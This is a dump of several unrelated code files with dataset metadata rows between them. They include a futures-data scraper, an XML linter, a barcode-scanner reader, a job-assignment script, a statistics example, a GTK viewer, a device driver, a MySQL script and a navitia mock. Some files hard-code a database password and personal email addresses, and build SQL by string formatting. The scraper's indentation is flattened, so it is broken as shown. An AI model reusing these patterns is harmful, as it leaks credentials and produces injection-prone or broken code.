import xml.dom.minidom
import dbconf
reload(sys)
sys.setdefaultencoding('utf8')
logging.basicConfig(filename='futures.log',format='%(asctime)s %(levelname)s %(message)s',level=logging.DEBUG)
# console = logging.StreamHandler();
# console.setLevel(logging.INFO);
# # set a format which is simpler for console use
# formatter = logging.Formatter('LINE %(lineno)-4d : %(levelname)-8s %(message)s');
# # tell the handler to use this format
# console.setFormatter(formatter);
# logging.getLogger('').addHandler(console);
# CFFEX (中金) always comes first as exchange 1, then Zhengzhou 2, Shanghai 3, Dalian 4
query1 = "insert into tr(og,ct,co,vl,dt) values (%s,%s,%s,%s,%s)"
query2 = "insert into lp(og,ct,co,vl,dt) values (%s,%s,%s,%s,%s)"
query3 = "insert into sp(og,ct,co,vl,dt) values (%s,%s,%s,%s,%s)"
url_date = "20130918"
logging.info("argv count:%s" % len(sys.argv))
if len(sys.argv)>1:
if sys.argv[1]!=None:
url_date = sys.argv[1]
else:
logging.info("未输入日期,则默认处理当前数据!")
now = date.today()
url_date = now.strftime('%Y%m%d')
logging.info("处理日期 url_date: %s",url_date)
'''obtain futures data'''
url_one = "http://www.cffex.com.cn/fzjy/ccpm/%s/%s/index.xml" % (url_date[0:6],url_date[6:8])
try:
f = None
req = urllib2.Request(url=url_one)
req.add_header('Context-Type', 'application/xml')
f = urllib2.urlopen(req)
rawdata = f.read()
if f.geturl().find('error_404') > 0 :
logging.error("此日期无信息!URL:%s" % url_date)
exit(0)
except Exception,e:
logging.error("下载此页信息失败!URL:%s" % url_one)
logging.error(e)
exit(1)
finally:
if f!=None:
f.close()
# f2=open('data_cffex_20130918.xml','w')
# f2.write(rawdata)
# f2.close()
# f3= open('data_cffex_20130918.xml','r')
# rawdata = f3.read()
# f3.close()
#delete already get data
conn = None
cursor = None
try:
conn = MySQLdb.Connection(dbconf.host, dbconf.user, dbconf.password, dbconf.dbname,charset='utf8')
cursor = conn.cursor()
delete_sql = "delete from lp where og='%s' and dt=%s;\
delete from sp where og='%s' and dt=%s;\
delete from tr where og='%s' and dt=%s;"
check_sql = "select count(*) from lp where og='%s' and dt=%s;"
cursor.execute(check_sql % (1,url_date))
logging.info("already get data count need delete: %s" % cursor.fetchall()[0][0])
cursor.execute(delete_sql % (1,url_date,1,url_date,1,url_date))
logging.info(delete_sql % ('中金',url_date,'中金',url_date,'中金',url_date))
except Exception,e:
logging.error(" MySQL server exception!!!")
logging.error(e)
sys.exit(1)
finally:
if cursor!= None:
cursor.close()
if conn!= None:
conn.commit()
conn.close()
ishasdata = False
logging.info("处理URL为:%s" % url_one)
# http://blog.sina.com.cn/s/blog_6d7e5bc301011mvv.html
rawdata = rawdata.replace('encoding="GBK"','encoding="utf-8"')
rawdata = unicode(rawdata,encoding='gbk').encode('utf-8')
dom = xml.dom.minidom.parseString(rawdata)
def getText(nodelist):
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc.append(node.data)
return ''.join(rc)
data_c = 0
for e in dom.getElementsByTagName("data"):
data_c+=1
logging.info( "find data count = %s" % data_c)
if data_c > 3:
ishasdata = True
logging.info("obtain data success,start process")
else:
logging.warning("此页未找到足够数据!obtain data failed date: %s" % url_one)
exit(0)
for index,e in enumerate(dom.getElementsByTagName("data")):
shortname = e.getElementsByTagName('shortname')
instrument = e.getElementsByTagName('instrumentId')
    dataType = e.getElementsByTagName('dataTypeId')  # 0 = trading volume, 1 = long/buy positions, 2 = short/sell positions
value = e.getElementsByTagName('volume')
instrument = getText(instrument[0].childNodes).strip()
shortname = getText(shortname[0].childNodes).strip()
dataType = getText(dataType[0].childNodes).strip()
value = getText(value[0].childNodes).strip()
try:
conn = None
cursor = None
conn = MySQLdb.Connection(dbconf.host, dbconf.user, dbconf.password, dbconf.dbname,charset='utf8')
cursor = conn.cursor()
if dataType == '0':
logging.info(query1 % (1,instrument,shortname,value,url_date))
cursor.execute(query1,('1',instrument,shortname,value,url_date))
if dataType == '1':
logging.info(query2 % (1,instrument,shortname,value,url_date))
cursor.execute(query2,('1',instrument,shortname,value,url_date))
if dataType == '2':
logging.info(query3 % (1,instrument,shortname,value,url_date))
cursor.execute(query3,('1',instrument,shortname,value,url_date))
except Exception,e:
logging.error(" MySQL server exception!!!")
logging.error(e)
sys.exit(1)
finally:
if cursor!= None:
cursor.close()
if conn!= None:
conn.commit()
conn.close()
time.sleep(1)
from smtpmail import send_mail
send_mail(["51649548@qq.com"],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date))
send_mail(["aaronfu@triumphantbank.com"],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date))
send_mail(["johlu@triumphantbank.com"],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date))
send_mail(["dangwannian@triumphantbank"],"中金持仓提取情况","%s数据 日期%s 提取完成" % ('中金',url_date))
| apache-2.0 | 7,432,032,874,748,383,000 | 29.928177 | 110 | 0.645766 | false | 2.835866 | false | false | false |
yv/exmldoc | py_src/exmldoc/__main__.py | 1 | 4583 | from __future__ import print_function
import optparse
import xml.etree.cElementTree as etree
from exmldoc import make_syntax_doc, process_schema, fill_attributes
def exml_lint_main(argv=None):
"""
Reads an EXML file and writes it back in normal form,
allowing a conversion between ExportXML and EXML-JSON
This file also demonstrates the use of exmldoc to stream
a larger document
"""
encoding = 'UTF-8'
oparse = optparse.OptionParser()
opts, args = oparse.parse_args(argv)
ctx = etree.iterparse(args[0], events=('start', 'end'))
doc = make_syntax_doc()
f_out = open(args[1], 'wb')
state = 'BEFORE_HEAD'
markable_stack = []
cur_pos = 0
last_stop = 0
in_word = False
for evt, elem in ctx:
if state == 'BEFORE_HEAD' and evt == 'end' and elem.tag == 'schema':
process_schema(doc, elem)
print('<?xml version="1.0" encoding="%s"?>' %
(encoding,), file=f_out)
print('<exml-doc>', file=f_out)
doc.describe_schema(f_out, encoding=encoding)
state = 'BEFORE_BODY'
elif state == 'BEFORE_BODY' and evt == 'start' and elem.tag == 'body':
state = 'IN_BODY'
print('<body serialization="inline">', file=f_out)
elif state == 'IN_BODY':
if evt == 'end' and elem.tag == 'body':
# TODO wrap up all loose ends
pass
elif evt == 'start':
# create markable
# TODO if a markable or word does not have an XML-id,
# assign one by default
if elem.tag == 'word':
schema = doc.t_schema
obj = schema.create_from_xml(elem, doc, encoding)
obj.span = [cur_pos, None]
doc.add_terminal(obj)
doc.object_by_id[obj.xml_id] = obj
in_word = True
else:
# set start point
try:
schema = doc.schema_by_name(elem.tag)
except KeyError:
# assume it's an edge; we'll deal with it later
if in_word:
(schema, obj) = (doc.t_schema, doc.words[-1])
elif markable_stack:
(schema, obj) = markable_stack[-1]
else:
schema = obj = None
try:
edge_schema = schema.edge_by_name(elem.tag)
except KeyError:
edge_schema = None
if edge_schema is not None:
pass
else:
print("No schema:", elem.tag, [
s.name for s in doc.schemas])
else:
obj = schema.create_from_xml(elem, doc, encoding)
obj.span = [cur_pos, None]
markable_stack.append((schema, obj))
elif evt == 'end':
# print elem.tag, markable_stack
if elem.tag == 'word':
in_word = False
cur_pos += 1
elif elem.tag == 'body':
fill_attributes(elem, doc, encoding)
elem.clear()
# write out part of the document
doc.write_inline_xml(f_out, last_stop, cur_pos)
doc.clear_markables(last_stop, cur_pos)
last_stop = cur_pos
state = 'AFTER_BODY'
elif markable_stack and elem.tag == markable_stack[-1][0].name:
# set end point of markable
(schema, obj) = markable_stack.pop()
obj.span[1] = cur_pos
doc.register_object(obj, schema)
if elem.tag == 'text':
# if it's a text markable, fill attributes and empty out
# the element
fill_attributes(elem, doc, encoding)
elem.clear()
# write out part of the document
doc.write_inline_xml(f_out, last_stop, cur_pos)
doc.clear_markables(last_stop, cur_pos)
last_stop = cur_pos
print('</body>', file=f_out)
print('</exml-doc>', file=f_out)
if __name__ == '__main__':
exml_lint_main()
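# --- Hedged usage note (assumption, not from the source): invoked as a
# module, the tool reads an EXML file and writes it back in normal form:
#
#   python -m exmldoc input.exml output.exml
#
# args[0] is the input path and args[1] the output path, matching the
# indexing in exml_lint_main() above.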
| lgpl-3.0 | -6,588,277,450,625,900,000 | 41.045872 | 79 | 0.458652 | false | 4.377268 | false | false | false |
addisonElliott/SmartShopTouchScreen | Util/scanner.py | 1 | 9453 | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from Util.exception import *
from Util import constants
from datetime import date, datetime
if sys.platform.startswith("linux"):
from evdev import *
from evdev.ecodes import *
import re
keycodeToASCII = {
KEY_1: ['1', '!'], KEY_2: ['2', '@'], KEY_3: ['3', '#'], KEY_4: ['4', '$'], KEY_5: ['5', '%'], KEY_6: ['6', '^'],
        KEY_7: ['7', '&'], KEY_8: ['8', '*'], KEY_9: ['9', '('], KEY_0: ['0', ')'], KEY_MINUS: ['-', '_'], KEY_EQUAL: ['=', '+'],
KEY_TAB: ['\t', '\t'], KEY_Q: ['q', 'Q'], KEY_W: ['w', 'W'], KEY_E: ['e', 'E'], KEY_R: ['r', 'R'], KEY_T: ['t', 'T'],
KEY_Y: ['y', 'Y'], KEY_U: ['u', 'U'], KEY_I: ['i', 'I'], KEY_O: ['o', 'O'], KEY_P: ['p', 'P'], KEY_LEFTBRACE: ['[', '{'],
KEY_RIGHTBRACE: [']', '}'], KEY_ENTER: ['\r\n', '\r\n'], KEY_A: ['a', 'A'], KEY_S: ['s', 'S'], KEY_D: ['d', 'D'],
KEY_F: ['f', 'F'], KEY_G: ['g', 'G'], KEY_H: ['h', 'H'], KEY_J: ['j', 'J'], KEY_K: ['k', 'K'], KEY_L: ['l', 'L'],
KEY_SEMICOLON: [';', ':'], KEY_APOSTROPHE: ['\'', '\"'], KEY_GRAVE: ['`', '~'], KEY_BACKSLASH: ['\\', '|'], KEY_Z: ['z', 'Z'],
KEY_X: ['x', 'X'], KEY_C: ['c', 'C'], KEY_V: ['v', 'V'], KEY_B: ['b', 'B'], KEY_N: ['n', 'N'], KEY_M: ['m', 'M'],
KEY_COMMA: [',', '<'], KEY_DOT: ['.', '>'], KEY_SLASH: ['/', '?'], KEY_SPACE: [' ', ' ']
}
numpadcodeToASCII = {
KEY_KPASTERISK: '*', KEY_KP7: '7', KEY_KP8: '8', KEY_KP9: '9', KEY_KPMINUS: '-', KEY_KP4: '4', KEY_KP5: '5', KEY_KP6: '6',
KEY_KPPLUS: '+', KEY_KP1: '1', KEY_KP2: '2', KEY_KP3: '3', KEY_KP0: '0', KEY_KPDOT: '.', KEY_KPSLASH: '/'
}
class BarcodeScanner(QObject):
# Signal is emitted once a barcode has been scanned and received
barcodeReceived = pyqtSignal(str)
def __init__(self, parent, usbPortNumber, shortcut=None, scannerTitle=None):
QObject.__init__(self, parent)
self.parent = parent
self.modifiers = {
KEY_RIGHTMETA: 0, # Right GUI - (usually the Windows key)
KEY_RIGHTALT: 0, # Right ALT
KEY_RIGHTSHIFT: 0, # Right Shift
KEY_RIGHTCTRL: 0, # Right Control
KEY_LEFTMETA: 0, # Left GUI - (again, usually the Windows key)
KEY_LEFTALT: 0, # Left ALT
KEY_LEFTSHIFT: 0, # Left Shift
KEY_LEFTCTRL: 0 # Left Control
}
self.state = {
KEY_CAPSLOCK: 0, # Caps Lock
KEY_NUMLOCK: 0, # Num Lock
KEY_SCROLLLOCK: 0, # Scroll Lock
}
# Setup the device by calling setPort with the desired port number
self.usbPortNumber = None
self.device = None
self.setPort(usbPortNumber)
# Set the current string buffer to none
self.curStr = ""
            # Set up the optional keyboard shortcut for manual barcode entry
if shortcut is not None:
self.shortcut = QShortcut(shortcut, self.parent)
self.shortcut.activated.connect(self.shortcut_activated)
if scannerTitle:
self.shortcutMessage = "Enter %s barcode: " % scannerTitle
else:
self.shortcutMessage = "Enter barcode: "
def setPort(self, usbPortNumber):
# Do nothing if the given port is the same as the current port
if self.usbPortNumber == usbPortNumber:
return
if constants.barcodeScannerDeviceEnable:
# If this scanner already has a device, ungrab it since were done with it
if self.device:
self.device.ungrab()
# This regex expression identifies a device on a specified USB port number
# I am not entirely sure if this is Raspbian specific, Linux specific or what,
# but it works in this case
rePhysicalLoc = re.compile("usb\-.*\..*\-1\.%i.*" % usbPortNumber)
# Loop through all available devices and search for a regex match
# First match found is the device we will use
devices = [InputDevice(fn) for fn in list_devices()]
self.device = None
for device in devices:
if rePhysicalLoc.match(device.phys) is not None:
self.device = device
break
# If unable to find the device at port number, raise error
if self.device is None:
raise SmartShopException("Unable to find input device located at port %i" % usbPortNumber)
# Grab current device so that no one else can receive input events from it
self.device.grab()
# Get the current state of the LED buttons; update self.state with the values that are on
ledStates = self.device.leds()
if LED_CAPSL in ledStates: self.state[KEY_CAPSLOCK] = 1
if LED_NUML in ledStates: self.state[KEY_NUMLOCK] = 1
if LED_SCROLLL in ledStates: self.state[KEY_SCROLLLOCK] = 1
# Set current port number to the given port number
self.usbPortNumber = usbPortNumber
def poll(self):
try:
if constants.barcodeScannerDeviceEnable:
# Read all of the events from the loop
deviceEvents = self.device.read()
for event in deviceEvents:
# Only accept keyboard events
if event.type is EV_KEY:
keyEvent = util.categorize(event)
if keyEvent.scancode in self.modifiers:
if keyEvent.keystate is events.KeyEvent.key_down: self.modifiers[keyEvent.scancode] = 1
elif keyEvent.keystate is events.KeyEvent.key_up: self.modifiers[keyEvent.scancode] = 0
elif keyEvent.scancode in self.state:
if keyEvent.keystate is events.KeyEvent.key_down: self.state[keyEvent.scancode] = 1
elif keyEvent.keystate is events.KeyEvent.key_up: self.state[keyEvent.scancode] = 0
elif keyEvent.keystate is events.KeyEvent.key_down or keyEvent.keystate is events.KeyEvent.key_hold:
if keyEvent.scancode is KEY_ENTER:
# Clear the curStr variable because recursion may occur where a barcode scan happens
# inside the barcodeReceived signal
emitStr = self.curStr
self.curStr = ""
self.barcodeReceived.emit(emitStr)
elif keyEvent.scancode in keycodeToASCII:
shift = (self.modifiers[KEY_LEFTSHIFT] or self.modifiers[KEY_RIGHTSHIFT])
self.curStr += keycodeToASCII[keyEvent.scancode][shift]
elif keyEvent.scancode in numpadcodeToASCII and self.state[KEY_NUMLOCK]:
                                    # append the numpad character to the scan buffer
                                    self.curStr += numpadcodeToASCII[keyEvent.scancode]
except BlockingIOError:
# If no events are available, this is thrown
# No actual error, move on
pass
@pyqtSlot()
def shortcut_activated(self):
barcode, ok = QInputDialog.getText(self.parent, "Scanner Input", self.shortcutMessage, QLineEdit.Normal, "",
Qt.WindowSystemMenuHint | Qt.WindowTitleHint | Qt.WindowCloseButtonHint)
if ok and barcode:
self.barcodeReceived.emit(barcode)
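    # --- Hedged usage sketch (assumption, not from the source): a host
    # widget would typically create the scanner, connect its signal, and
    # poll it periodically from a QTimer, e.g.
    #
    #   scanner = BarcodeScanner(window, usbPortNumber=1)
    #   scanner.barcodeReceived.connect(window.on_barcode)
    #   timer = QTimer(window)
    #   timer.timeout.connect(scanner.poll)
    #   timer.start(50)   # poll every 50 ms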
elif sys.platform.startswith("win32"):
class BarcodeScanner(QObject):
# Signal is emitted once a barcode has been scanned and received
barcodeReceived = pyqtSignal(str)
def __init__(self, parent, usbPortNumber, shortcut=None, scannerTitle=None):
QObject.__init__(self, parent)
self.parent = parent
# There is no need to implement the actual barcode reader on Windows since we are using Raspberry Pi 3
# Set the current string buffer to none
if shortcut is not None:
self.shortcut = QShortcut(shortcut, self.parent)
self.shortcut.activated.connect(self.shortcut_activated)
if scannerTitle:
self.shortcutMessage = "Enter %s barcode: " % scannerTitle
else:
self.shortcutMessage = "Enter barcode: "
def setPort(self, usbPortNumber):
# Do nothing
pass
def poll(self):
# Do nothing in poll
pass
@pyqtSlot()
def shortcut_activated(self):
barcode, ok = QInputDialog.getText(self.parent, "Scanner Input", self.shortcutMessage, QLineEdit.Normal, "",
Qt.WindowSystemMenuHint | Qt.WindowTitleHint | Qt.WindowCloseButtonHint)
if ok and barcode:
self.barcodeReceived.emit(barcode.strip()) | agpl-3.0 | 3,383,333,563,418,400,000 | 49.287234 | 134 | 0.520787 | false | 4.108214 | false | false | false |
benjaminnow/swimapp | job_choosing.py | 1 | 3447 | from db import *
import random
from operator import itemgetter
def get_min():
conn, cur = connection()
cur.execute('SELECT minimum FROM jobs')
draws = cur.fetchall()
count = 0
for i in range(len(draws)):
count += draws[i]['minimum']
return count
def get_available():
conn, cur = connection()
cur.execute('SELECT COUNT(*) FROM here')
people = cur.fetchall()
peoplenum = people[0]['COUNT(*)']
return peoplenum
def get_job_total():
conn, cur = connection()
cur.execute('SELECT job_total FROM here')
ids = cur.fetchall()
total = 0
for i in range(len(ids)):
total += ids[i]['job_total']
conn.close()
return total
def high_low():
start = 0
conn, cur = connection()
cur.execute('SELECT job_total, id FROM here')
ids = cur.fetchall()
for i in range(len(ids)):
low = start
high = start + ids[i]['job_total']
start = high
ids[i]['low'] = low
ids[i]['high'] = high
conn.close()
return ids
def choose_people():
rangeDict = high_low()
#print(len(rangeDict))
rangeList = list(high_low())
total = get_job_total()
print('Total is ' + str(total))
count = get_min()
idList = []
start = 0
'''
* I cant change the variable in range function when a for loop happens. If no Break, it breaks loop because pop happened
* sometimes it is not found in list
'''
for i in range(count):
randnum = random.randint(1, total)
# print(randnum)
# found = False
for j in range(len(rangeList)):
if randnum > rangeList[j]['low'] and randnum <= rangeList[j]['high']:
idList.append([rangeList[j]['id'], rangeList[j]['job_total']])
total -= rangeList[j]['job_total']
# print('FOUND ' + str(rangeList[j]['id']))
#print(total)
rangeList.pop(j)
# found = True
break
# if not found:
# print('not found!!!')
# print(rangeList)
# print('TOTAL IS ' + str(total))
# found = False
for k in range(len(rangeList)):
low = start
high = start + rangeList[k]['job_total']
start = high
rangeList[k]['low'] = low
rangeList[k]['high'] = high
#print(rangeList)
start = 0
idList.sort(key=itemgetter(1), reverse=True)
conn, cur = connection()
cur.execute('SELECT name, difficulty, minimum, id FROM jobs WHERE dump = 1')
job = cur.fetchall()
jobName = job[0]['name']
jobAmount = job[0]['difficulty']
jobId = job[0]['id']
for p in range(len(rangeDict)):
found = False
for q in range(len(idList)):
if rangeDict[p]['id'] == idList[q][0]:
found = True
idnum = rangeDict[p]['id']
if not found:
cur.execute('INSERT IGNORE INTO jobs_done(id, job_name, job_id, amount) VALUES(%s, %s, %s, %s)', (idnum, jobName, jobId, jobAmount))
conn.commit()
cur.execute('INSERT INTO jobs_done_history(id, job_name, job_id, amount) VALUES(%s, %s, %s, %s)', (idnum, jobName, jobId, jobAmount))
conn.commit()
cur.execute('UPDATE swimmers set job_total = job_total + %s WHERE id=%s', (int(jobAmount), idnum))
conn.commit()
conn.close()
return idList
| mit | 7,270,981,957,304,775,000 | 29.236842 | 145 | 0.547433 | false | 3.643763 | false | false | false |
0todd0000/spm1d | spm1d/rft1d/examples/weather_1_rft.py | 1 | 2199 |
import numpy as np
from scipy.ndimage.filters import gaussian_filter1d
from matplotlib import pyplot
from spm1d import rft1d
#(0) Load weather data:
weather = rft1d.data.weather() #dictionay containing geographical locations
### choose two geographical locations:
yA,yB = weather['Atlantic'], weather['Continental']
### smooth:
yA = gaussian_filter1d(yA, 8.0, axis=1, mode='wrap')
yB = gaussian_filter1d(yB, 8.0, axis=1, mode='wrap')
#(1) Two-sample t statistic (comparing just the two largest groups):
nA,nB = yA.shape[0], yB.shape[0] #sample sizes
mA,mB = yA.mean(axis=0), yB.mean(axis=0) #means
sA,sB = yA.std(ddof=1, axis=0), yB.std(ddof=1, axis=0) #standard deviations
s = np.sqrt( ((nA-1)*sA*sA + (nB-1)*sB*sB) / (nA + nB - 2) ) #pooled standard deviation
t = (mA-mB) / ( s *np.sqrt(1.0/nA + 1.0/nB)) #t field
#(2) Estimate field smoothness:
rA,rB = yA-mA, yB-mB #residuals
r = np.vstack([rA,rB])
FWHM = rft1d.geom.estimate_fwhm(r)
#(3) Critical threshold (classical hypothesis testing):
alpha = 0.05
df = nA + nB - 2 #degrees of freedom
Q = yA.shape[1] #number of nodes (field length = Q-1)
tstar = rft1d.t.isf(alpha, df, Q, FWHM) #inverse survival function
#(4) Get upcrossing metrics:
calc = rft1d.geom.ClusterMetricCalculator()
k = calc.cluster_extents(t, tstar, interp=True)
k_resels = [kk/FWHM for kk in k]
nClusters = len(k)
#(5) Probabilities:
rftcalc = rft1d.prob.RFTCalculator(STAT='T', df=(1,df), nodes=Q, FWHM=FWHM)
Pset = rftcalc.p.set(nClusters, min(k_resels), tstar)
Pcluster = [rftcalc.p.cluster(kk, tstar) for kk in k_resels]
#(6) Plot:
pyplot.close('all')
ax = pyplot.axes()
ax.plot(t, 'k', lw=3, label='t field')
ax.plot([0,Q], [tstar]*2, 'r--', label='Critical threshold')
### legend:
ax.legend(loc='upper left')
### cluster p values:
ax.text(10, 3.0, 'p = %.3f'%Pcluster[0])
ax.text(300, 3.6, 'p = %.3f'%Pcluster[1])
ax.text(280, 2.3, r'$\alpha$ = %.3f'%alpha, color='r')
### axis labels:
ax.set_xlabel('Day', size=16)
ax.set_ylabel('t value', size=16)
ax.set_title('RFT-based inference of weather dataset', size=20)
pyplot.show()
| gpl-3.0 | -8,181,589,285,242,608,000 | 27.558442 | 104 | 0.638927 | false | 2.398037 | false | false | false |
flyingarg/GPU-Viewer | GPU-Viewer/FrameBuffer.py | 1 | 3651 | import gi
import os
import Const
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
from Common import setScreenSize, setBackgroundColor, createScrollbar
FrameBufferList = ["vid", "vdep", "vt", "xsp", "bfsz", "lvl", "rt", "db", "st", "rsz", "gsz", "bsz", "asz", "flt",
"srgb", "aux", "depth", "stcl",
"acr", "acg", "acb", "aca", "msnum", "msbufs", "caveats"]
def FrameBuffer(button):
def GLXFB(button, value):
FB_Store.clear()
TreeFB.set_model(FB_Store)
if value == 1:
os.system(
"glxinfo | awk '/GLX Visuals.*/{flag=1;next}/GLXFBConfigs.*/{flag=0}flag' | awk '/----.*/{flag=1;next}flag' > /tmp/FrameBufferGLXVisual.txt")
list = []
with open("/tmp/FrameBufferGLXVisual.txt", "r") as file1:
for line in file1:
list.append(line.split())
for i in range(len(list) - 1):
background_color = setBackgroundColor(i)
FB_Store.append(list[i] + [background_color])
label = "%d GLX Visuals" % (len(list) - 1)
button.set_label(label)
if value == 2:
os.system(
"glxinfo | awk '/GLXFBConfigs.*/{flag=1;next}flag' | awk '/----.*/{flag=1;next}flag' > /tmp/FrameBufferGLXFBconfigs.txt")
list = []
with open("/tmp/FrameBufferGLXFBconfigs.txt", "r") as file1:
for line in file1:
list.append(line.split())
for i in range(len(list) - 1):
background_color = setBackgroundColor(i)
if list[i][6] == "r" or list[i][6] == "c":
pass
else:
list[i].insert(6, ".")
FB_Store.append(list[i] + [background_color])
label = "%d GLXFBConfigs" % (len(list) - 1)
button.set_label(label)
FBWin = Gtk.Window()
FBWin.set_title("GLX Frame Buffer Configuration")
# FBWin.set_size_request(1000, 500)
setScreenSize(FBWin, Const.WIDTH_RATIO, Const.HEIGHT_RATIO2)
FBGrid = Gtk.Grid()
FBWin.add(FBGrid)
FBGrid.set_border_width(20)
FBGrid.set_row_spacing(30)
FBGLXButton = Gtk.RadioButton("GLX Visuals")
FBGLXButton.connect("toggled", GLXFB, 1)
FBGrid.add(FBGLXButton)
FBConfigButton = Gtk.RadioButton.new_from_widget(FBGLXButton)
FBConfigButton.set_label("GLXFBConfigs")
FBConfigButton.connect("toggled", GLXFB, 2)
FBGrid.attach_next_to(FBConfigButton, FBGLXButton, Gtk.PositionType.RIGHT, 1, 1)
FBFrame = Gtk.Frame()
FB_Store = Gtk.ListStore(str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str,
str, str, str, str, str, str, str, str)
TreeFB = Gtk.TreeView(FB_Store, expand=True)
TreeFB.set_enable_search(True)
TreeFB.set_property("enable-grid-lines", 3)
FBConfigButton.set_active(True)
FBGLXButton.set_active(True)
for i, column_title in enumerate(FrameBufferList):
FBrenderer = Gtk.CellRendererText(font=Const.FONT)
column = Gtk.TreeViewColumn(column_title, FBrenderer, text=i)
column.add_attribute(FBrenderer, "background", 25)
if i < len(FrameBufferList) - 1:
FBrenderer.set_alignment(0.5, 0.5)
column.set_alignment(0.5)
column.set_property("min-width", 40)
TreeFB.append_column(column)
FBScrollbar = createScrollbar(TreeFB)
FBFrame.add(FBScrollbar)
FBGrid.attach_next_to(FBFrame, FBGLXButton, Gtk.PositionType.BOTTOM, 25, 1)
FBWin.show_all()
# Gtk.main()
| gpl-3.0 | -2,104,989,221,263,291,000 | 37.431579 | 157 | 0.580663 | false | 3.199825 | true | false | false |
motivator/clusto | src/clusto/drivers/base/device.py | 5 | 3638 | from clusto.drivers.base import Driver
import sys
class Device(Driver):
_properties = {'model':None,
'serialnum':None,
'manufacturer':None}
_clustotype = "device"
_driver_name = "device"
@classmethod
def get_by_serial_number(self, serialnum):
pass
def _get_hostname(self):
"""return a hostname set for this device or its entity name"""
hostname = self.attrs("hostname")
if hostname:
return hostname[0].value
else:
return self.entity.name
def _set_hostname(self, name):
self.set_attr("hostname", value=name)
hostname = property(_get_hostname, _set_hostname)
@property
def fqdns(self):
"""return the fully qualified domain names for this device"""
return self.attr_values("fqdn")
def add_fqdn(self, fqdn):
"""add a fully qualified domain name"""
if not self.has_attr("fqdn", number=True, value=fqdn):
self.add_attr("fqdn", number=True, value=fqdn)
def remove_fqdn(self, fqdn):
"""remove a fully qualified domain name"""
self.del_attrs("fqdn", number=True, value=fqdn)
def _power_captcha(self, action='reboot'):
while True:
sys.stdout.write('Are you sure you want to %s %s (yes/no)? ' %
(action, self.name,))
line = sys.stdin.readline().rstrip('\r\n')
if line == 'yes':
return True
if line == 'no':
return False
sys.stdout.write('"yes" or "no", please\n')
def power_on(self, captcha=True):
if captcha and not self._power_captcha('power on'):
return
ports_set = 0
for porttype, ports in self.port_info.items():
if not porttype.startswith('pwr-'): continue
for portnum, port in ports.items():
if not port['connection']: continue
port['connection'].set_power_on(porttype, port['otherportnum'])
ports_set += 1
return ports_set
def power_off(self, captcha=True):
if captcha and not self._power_captcha('power off'):
return
ports_set = 0
for porttype, ports in self.port_info.items():
if not porttype.startswith('pwr-'): continue
for portnum, port in ports.items():
if not port['connection']: continue
port['connection'].set_power_off(porttype, port['otherportnum'])
ports_set += 1
return ports_set
def power_reboot(self, captcha=True):
if captcha and not self._power_captcha('reboot'):
return
ports_rebooted = 0
for porttype, ports in self.port_info.items():
if not porttype.startswith('pwr-'): continue
for portnum, port in ports.items():
if not port['connection']: continue
port['connection'].reboot(porttype, port['otherportnum'])
ports_rebooted += 1
return ports_rebooted
def console(self, ssh_user='root'):
console = self.port_info['console-serial'][1]
if not console['connection']:
sys.stderr.write('No console connected to %s console-serial:1\n' % self.name)
sys.stderr.flush()
return
if not hasattr(console['connection'], 'console'):
sys.stderr.write('No console method on %s\n' % console.name)
sys.stderr.flush()
return
console['connection'].connect('console-serial', console['otherportnum'], ssh_user)
| bsd-3-clause | 3,395,162,878,551,785,000 | 30.912281 | 90 | 0.564596 | false | 4.176808 | false | false | false |
Yrthgze/prueba-sourcetree2 | Drake-Z/0002/0002.py | 2 | 1231 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'第 0002 题:将 0001 题生成的 200 个激活码(或者优惠券)保存到 MySQL 关系型数据库中。'
__author__ = 'Drake-Z'
import mysql.connector
def write_to_mysql(filename):
conn = mysql.connector.connect(user='root', password='986535', database='test')
cursor = conn.cursor()
cursor.execute("DROP TABLE IF EXISTS user")
cursor.execute('create table user (id varchar(20) primary key, name varchar(20))')
f = open(filename, 'r').readlines()
for line, num in zip(f, range(1, len(f)+1)):
line = line[:-1] #去除\n符号
cursor.execute('insert into user (id, name) values (%s, %s)', [str(num), line])
conn.commit()
cursor.close()
return 0
def search_mysql():
b = input('Search Active code(1-200):')
conn = mysql.connector.connect(user='root', password='986535', database='test')
cursor = conn.cursor()
cursor.execute('select * from user where id = %s', (b,))
values = cursor.fetchall()
print(values)
cursor.close()
conn.close()
return 0
if __name__ == '__main__':
filename = 'active_code.txt'
write_to_mysql(filename)
search_mysql() | mit | -1,601,573,057,003,070,500 | 30.297297 | 87 | 0.611927 | false | 2.981959 | false | false | false |
CanalTP/kirin | tests/mock_navitia/vj_9580.py | 1 | 29816 | # coding=utf-8
#
# Copyright (c) 2001, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# [matrix] channel #navitia:matrix.org (https://app.element.io/#/room/#navitia:matrix.org)
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
from tests.mock_navitia import navitia_response
response = navitia_response.NavitiaResponse()
response.queries = [
"vehicle_journeys/?depth=2&since=20121120T120100Z&headsign=9580&show_codes=true&until=20121120T214600Z"
]
response.response_code = 200
response.json_response = """{
"pagination": {
"start_page": 0,
"items_on_page": 1,
"items_per_page": 25,
"total_result": 1
},
"links": [
{
"href": "http://localhost:5001/v1/coverage/stif/stop_points/{stop_point.id}",
"type": "stop_point",
"rel": "stop_points",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/stop_areas/{stop_area.id}",
"type": "stop_area",
"rel": "stop_areas",
